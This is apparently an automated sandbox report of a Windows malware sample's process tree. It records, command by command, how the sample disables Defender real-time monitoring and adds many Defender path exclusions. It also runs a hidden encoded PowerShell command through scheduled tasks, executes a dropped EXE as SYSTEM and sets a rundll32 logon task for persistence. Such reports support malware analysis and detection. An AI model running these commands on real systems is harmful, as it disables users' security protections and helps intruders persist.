C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1160
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNzfrQBUu" /SC once /ST 10:16:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNzfrQBUu"3⤵PID:976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNzfrQBUu"3⤵PID:1128
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:323⤵PID:1820
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:643⤵PID:1544
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:323⤵PID:580
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:324⤵PID:1732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:643⤵PID:1764
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:644⤵PID:840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\grMXAHIUMHIHAuvw\frpukqJa\eqbdqfaWYhUUPtlL.wsf"3⤵PID:624
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\grMXAHIUMHIHAuvw\frpukqJa\eqbdqfaWYhUUPtlL.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1724 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:324⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:644⤵PID:1980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:324⤵PID:1204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:644⤵PID:1348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:324⤵PID:528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:644⤵PID:1016
-
-
            C:\Windows\SysWOW64\reg.exe
            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:32
            PID: 660

            C:\Windows\SysWOW64\reg.exe
            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:64
            - Windows security bypass
            PID: 1980

            C:\Windows\SysWOW64\reg.exe
            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:32
            PID: 1084

            C:\Windows\SysWOW64\reg.exe
            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:64
            PID: 276

            C:\Windows\SysWOW64\reg.exe
            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:32
            PID: 824

            C:\Windows\SysWOW64\reg.exe
            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:64
            PID: 1128

            C:\Windows\SysWOW64\reg.exe
            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:32
            PID: 1768

            C:\Windows\SysWOW64\reg.exe
            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:64
            PID: 860

            C:\Windows\SysWOW64\reg.exe
            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:32
            PID: 1760

            C:\Windows\SysWOW64\reg.exe
            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:64
            PID: 1732

            C:\Windows\SysWOW64\reg.exe
            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32
            PID: 624

            C:\Windows\SysWOW64\reg.exe
            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64
            PID: 2032
        C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gYcgxhZvm" /SC once /ST 10:18:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        - Creates scheduled task(s)
        PID: 2020

        C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gYcgxhZvm"
        PID: 1340

        C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "gYcgxhZvm"
        PID: 748

        C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
        PID: 1644

            C:\Windows\SysWOW64\reg.exe
            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
            PID: 1296

        C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
        PID: 1608

            C:\Windows\SysWOW64\reg.exe
            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
            PID: 1368
        C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "biFxKMwOTZzXEKwTU" /SC once /ST 10:45:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe\" NQ /site_id 525403 /S" /V1 /F
        - Drops file in Windows directory
        - Creates scheduled task(s)
        PID: 1392

        C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "biFxKMwOTZzXEKwTU"
        PID: 1856

    C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe
    C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\UbWVVsy.exe NQ /site_id 525403 /S
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID: 800

        C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "bWLKrWFeqGsUKIPSIT"
        PID: 1420

        C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
        PID: 1092

            C:\Windows\SysWOW64\reg.exe
            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
            PID: 996

        C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
        PID: 624

            C:\Windows\SysWOW64\reg.exe
            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
            PID: 1572

        C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SvbbHukzU\TThBQi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HvGgydgoxkjNzSQ" /V1 /F
        - Drops file in Windows directory
        - Creates scheduled task(s)
        PID: 1724
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
PID: 1408

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
PID: 876

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
PID: 1184
Network
MITRE ATT&CK Enterprise v6
Downloads